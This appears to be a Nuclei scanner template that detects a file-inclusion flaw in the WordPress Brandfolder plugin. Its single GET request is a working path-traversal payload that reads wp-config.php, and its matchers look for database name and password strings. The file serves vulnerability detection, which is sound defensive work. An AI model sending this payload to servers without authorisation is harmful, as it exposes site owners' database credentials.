nuclei-templates/http/vulnerabilities/wordpress/brandfolder-lfi.yaml

38 lines
972 B
YAML

id: brandfolder-lfi
info:
name: Wordpress Brandfolder - Remote/Local File Inclusion
author: 0x_Akoko
severity: high
description: WordPress Brandfolder allows remote attackers to access arbitrary files that reside on the local and remote server and disclose their content.
reference:
- https://www.exploit-db.com/exploits/39591
- https://cxsecurity.com/issue/WLB-2016030120
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cwe-id: CWE-22
tags: lfi,rfi,edb,wordpress,wp-plugin
metadata:
max-request: 1
http:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/brandfolder/callback.php?wp_abspath=../../../wp-config.php%00'
matchers-condition: and
matchers:
- type: word
words:
- "DB_NAME"
- "DB_PASSWORD"
part: body
condition: and
- type: status
status:
- 200
# Enhanced by mp on 2022/08/01